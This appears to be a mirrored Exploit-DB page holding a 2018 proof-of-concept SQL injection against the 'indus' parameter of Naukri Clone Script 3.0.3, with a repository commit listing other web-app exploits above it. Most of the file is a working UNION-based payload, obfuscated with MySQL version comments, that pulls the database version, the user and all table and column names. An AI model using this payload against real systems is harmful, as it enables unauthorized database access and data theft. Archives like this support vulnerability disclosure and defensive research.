bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/44008.txt
Offensive Security 8d28b02dc1 DB: 2018-02-11 
9 changes to exploits/shellcodes

JBoss 4.2.x/4.3.x - Information Disclosure
Naukri Clone Script 3.0.3 - 'indus' SQL Injection
Facebook Clone Script 1.0.5 - Cross-Site Scripting
Schools Alert Management Script 2.0.2 - Arbitrary File Upload
Lawyer Search Script 1.0.2 - Cross-Site Scripting
Bitcoin MLM Software 1.0.2 - Cross-Site Scripting
Select Your College Script 2.0.2 - Authentication Bypass
Multi religion Responsive Matrimonial 4.7.2 - Cross-Site Scripting
Multi Language Olx Clone Script - Cross-Site Scripting
2018-02-11 05:01:52 +00:00

24 lines
No EOL
1.1 KiB
Text
Raw Blame History

# Exploit Title: Naukri Clone Script 3.0.3 - 'indus' SQL Injection
# Dork: N/A
# Date: 2018-02-08
# Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com
# Vendor Homepage: https://www.phpscriptsmall.com/product/naukri-clone-script/
# Version: 3.0.3
# Category: Webapps
# CVE: N/A
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands.
# # # # #
# Proof of Concept :
SQLi:
#
http://localhost/jobsite-advanced/searchresult.php?searchindus&indus=[SQL]
# Parameter : indus (GET)
# Type: UNION QUERY
# Title: Generic UNION query (NULL) - 51 columns
# payload : UNION SELECT
NULL,NULL,NULL,/*!00000Concat(0x3C62723E,version(),0x3C62723E,user(),0x3C62723E,database())*/,NULL,NULL,NULL,/*!00000group_coNcat(0x3C62723E,table_name,0x3a,column_name)*/,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL/*!00000from*/ information_schema.columns where table_schema=database()%23
Reference in a new issue View git blame Copy permalink